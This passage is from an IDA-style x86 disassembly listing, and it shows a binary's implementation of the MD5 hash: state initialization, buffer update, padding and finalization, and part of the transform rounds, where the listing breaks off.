mov eax, [ebp+arg_4]
leave
retn
sub_40F040 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F11F proc near ; CODE XREF: sub_40ECEB+D�p
; sub_40ED6E+D�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
mov dword ptr [eax], 67452301h
mov eax, [ebp+arg_0]
mov dword ptr [eax+4], 0EFCDAB89h
mov eax, [ebp+arg_0]
mov dword ptr [eax+8], 98BADCFEh
mov eax, [ebp+arg_0]
mov dword ptr [eax+0Ch], 10325476h
mov eax, [ebp+arg_0]
and dword ptr [eax+10h], 0
mov eax, [ebp+arg_0]
and dword ptr [eax+14h], 0
pop ebp
retn
sub_40F11F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F159 proc near ; CODE XREF: sub_40ECEB+1D�p
; sub_40ED6E+1D�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax*8]
mov ecx, [ebp+arg_0]
mov [ecx+10h], eax
mov eax, [ebp+arg_0]
mov eax, [eax+10h]
cmp eax, [ebp+var_4]
jnb short loc_40F18E
mov eax, [ebp+arg_0]
mov eax, [eax+14h]
inc eax
mov ecx, [ebp+arg_0]
mov [ecx+14h], eax
loc_40F18E: ; CODE XREF: sub_40F159+26�j
mov eax, [ebp+arg_8]
shr eax, 1Dh
mov ecx, [ebp+arg_0]
mov ecx, [ecx+14h]
add ecx, eax
mov eax, [ebp+arg_0]
mov [eax+14h], ecx
mov eax, [ebp+var_4]
shr eax, 3
and eax, 3Fh
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_40F21C
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax+18h]
mov [ebp+var_8], eax
push 40h
pop eax
sub eax, [ebp+var_4]
mov [ebp+var_4], eax
mov eax, [ebp+arg_8]
cmp eax, [ebp+var_4]
jnb short loc_40F1E8
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
jmp locret_40F26C
; ---------------------------------------------------------------------------
loc_40F1E8: ; CODE XREF: sub_40F159+77�j
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+var_8]
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+arg_0]
add eax, 18h
push eax
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, [ebp+var_4]
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, [ebp+var_4]
mov [ebp+arg_8], eax
loc_40F21C: ; CODE XREF: sub_40F159+59�j
; sub_40F159+FC�j
cmp [ebp+arg_8], 40h
jb short loc_40F257
push 40h
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F3CE
pop ecx
pop ecx
mov eax, [ebp+arg_4]
add eax, 40h
mov [ebp+arg_4], eax
mov eax, [ebp+arg_8]
sub eax, 40h
mov [ebp+arg_8], eax
jmp short loc_40F21C
; ---------------------------------------------------------------------------
loc_40F257: ; CODE XREF: sub_40F159+C7�j
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_0]
add eax, 18h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
locret_40F26C: ; CODE XREF: sub_40F159+8A�j
leave
retn
sub_40F159 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F26E proc near ; CODE XREF: sub_40ECEB+2E�p
; sub_40ED6E+2E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+arg_4]
mov eax, [eax+10h]
shr eax, 3
and eax, 3Fh
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov ecx, [ebp+arg_4]
lea eax, [ecx+eax+18h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov byte ptr [eax], 80h
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
push 3Fh
pop eax
sub eax, [ebp+var_8]
mov [ebp+var_8], eax
cmp [ebp+var_8], 8
jnb short loc_40F2E1
push [ebp+var_8]
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 38h
push 0
mov eax, [ebp+arg_4]
add eax, 18h
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp short loc_40F2F5
; ---------------------------------------------------------------------------
loc_40F2E1: ; CODE XREF: sub_40F26E+3B�j
mov eax, [ebp+var_8]
sub eax, 8
push eax
push 0
push [ebp+var_4]
call sub_416B6A ; memset
add esp, 0Ch
loc_40F2F5: ; CODE XREF: sub_40F26E+71�j
push 8
mov eax, [ebp+arg_4]
add eax, 10h
push eax
mov eax, [ebp+arg_4]
add eax, 50h
push eax
call sub_40F33F
add esp, 0Ch
mov eax, [ebp+arg_4]
add eax, 18h
push eax
push [ebp+arg_4]
call sub_40F3CE
pop ecx
pop ecx
push 10h
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40F33F
add esp, 0Ch
push 4
push 0
push [ebp+arg_4]
call sub_416B6A ; memset
add esp, 0Ch
leave
retn
sub_40F26E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F33F proc near ; CODE XREF: sub_40F26E+97�p
; sub_40F26E+B8�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_40F35E
; ---------------------------------------------------------------------------
loc_40F34E: ; CODE XREF: sub_40F33F+8B�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_40F35E: ; CODE XREF: sub_40F33F+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_40F3CC
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 8
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+1], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 10h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+2], al
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov eax, [ecx+eax*4]
shr eax, 18h
and eax, 0FFh
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_8]
mov [ecx+3], al
jmp short loc_40F34E
; ---------------------------------------------------------------------------
locret_40F3CC: ; CODE XREF: sub_40F33F+25�j
leave
retn
sub_40F33F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40F3CE proc near ; CODE XREF: sub_40F159+AA�p
; sub_40F159+E3�p ...
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 50h
push 40h
push [ebp+arg_4]
lea eax, [ebp+var_50]
push eax
call sub_410244
add esp, 0Ch
mov eax, [ebp+arg_0]
mov eax, [eax]
mov [ebp+var_4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
mov [ebp+var_C], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-28955B88h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-173848AAh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+242070DBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-3E423112h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-0A83F051h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4787C62Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-57CFB9EDh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-2B96AFFh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+698098D8h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-74BB0851h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0A44Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-76A32842h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_C]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6B901122h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 7
mov ecx, [ebp+var_4]
shr ecx, 19h
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_8]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-2678E6Dh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ch
mov ecx, [ebp+var_10]
shr ecx, 14h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_4]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5986BC72h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 11h
mov ecx, [ebp+var_C]
shr ecx, 0Fh
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_10]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+49B40821h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 16h
mov ecx, [ebp+var_8]
shr ecx, 0Ah
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-9E1DA9Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3FBF4CC0h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+265E5A51h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_50]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-16493856h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-29D0EFA3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+2441453h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-275E197Fh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-182C0438h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+21E1CDE6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3CC8F82Ah]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-0B2AF279h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+455A14EDh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
and eax, [ebp+var_8]
mov ecx, [ebp+var_10]
not ecx
and ecx, [ebp+var_C]
or eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-561C16FBh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 5
mov ecx, [ebp+var_4]
shr ecx, 1Bh
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
and eax, [ebp+var_4]
mov ecx, [ebp+var_C]
not ecx
and ecx, [ebp+var_8]
or eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-3105C08h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 9
mov ecx, [ebp+var_10]
shr ecx, 17h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
and eax, [ebp+var_10]
mov ecx, [ebp+var_8]
not ecx
and ecx, [ebp+var_4]
or eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+676F02D9h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Eh
mov ecx, [ebp+var_C]
shr ecx, 12h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
and eax, [ebp+var_C]
mov ecx, [ebp+var_4]
not ecx
and ecx, [ebp+var_10]
or eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-72D5B376h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 14h
mov ecx, [ebp+var_8]
shr ecx, 0Ch
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_3C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5C6BEh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-788E097Fh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_24]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+6D9D6122h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_18]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-21AC7F4h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_4C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-5B4115BCh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_40]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+4BDECFA9h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_34]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-944B4B0h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
mov ecx, [ebp+var_C]
shr ecx, 10h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
xor eax, [ebp+var_10]
xor eax, [ebp+var_4]
add eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-41404390h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 17h
mov ecx, [ebp+var_8]
shr ecx, 9
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
xor eax, [ebp+var_C]
xor eax, [ebp+var_10]
add eax, [ebp+var_1C]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+289B7EC6h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 4
mov ecx, [ebp+var_4]
shr ecx, 1Ch
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
xor eax, [ebp+var_8]
xor eax, [ebp+var_C]
add eax, [ebp+var_50]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-155ED806h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Bh
mov ecx, [ebp+var_10]
shr ecx, 15h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
xor eax, [ebp+var_4]
xor eax, [ebp+var_8]
add eax, [ebp+var_44]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-2B10CF7Bh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 10h
